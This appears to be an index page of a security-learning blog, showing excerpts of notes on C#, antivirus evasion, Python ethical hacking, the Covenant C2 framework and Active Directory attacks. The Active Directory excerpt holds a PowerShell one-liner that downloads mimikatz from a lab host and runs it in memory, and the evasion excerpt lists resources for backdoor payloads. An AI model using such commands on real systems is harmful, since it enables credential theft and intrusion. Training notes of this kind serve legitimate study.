C# – Basics and examples

C# – Basics and examples

C# Basics Data Types C# provides a number of built-in data types, including integers, floating-point numbers, booleans, and characters. Here are some examples: In this code, we declare and initialize variables of type int, float, bool, and char. The int and float types are used for storing numerical values, while the bool type is used…

AV Evasion 101: Essential Techniques and Concepts

AV Evasion 101: Essential Techniques and Concepts

Source Good tools Malware forums/channels/discord Test payload against AV Defcon – Writing custom backdoor payloads with C# GitHub – mvelazc0/defcon27_csharp_workshop: Writing custom backdoor payloads with C# – Defcon 27 Workshop Step by Step for obfuscating code AV Evasion MindMap – From Start to finish (AV) Anti-Virus – The Hacker Recipes General AV Evasion cheatsheet Check…

Python Notes and Examples

Python Notes and Examples

Here are my notes from different courses I’m taking. Courses and resources https://www.udemy.com/course/learn-python-and-ethical-hacking-from-scratch/ https://tryhackme.com/room/pythonbasics https://tryhackme.com/room/pythonforcybersecurity Notes from ‘Learn Python & Ethical Hacking From Scratch‘ Lecture 1 – MAC Address Changer https://docs.python.org/3/library/subprocess.html Change MAC address using subprocess Script upgrade using variables Input from user Handling user input The above example is not a secure way as…

Command And Control – C2 Framework

Command And Control – C2 Framework

This is notes from Holo room. https://www.tryhackme.com/room/hololive Covenant Installation and setup From the Covenant GitHub, “Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.” For more information…

Active Directory – Notes, Methodology, Cheatsheet

Active Directory – Notes, Methodology, Cheatsheet

These are my notes from the Active Directory networks at TryHackMe, as well as notes from other sources. Inspo: Work in progress References Matrix Impacket – SecureAuth Name Explanation Tools/attack example Unconstrained delegation Constrained delegation Resource-based constrained delegation mimikatz.exe Dump hashes invoke-mimikatz ps1 version of mimikatz. To load into memory (New-Object System.Net.WebClient).DownloadString(‘http://192.168.119.120/mimikatz.txt’) | IEX and…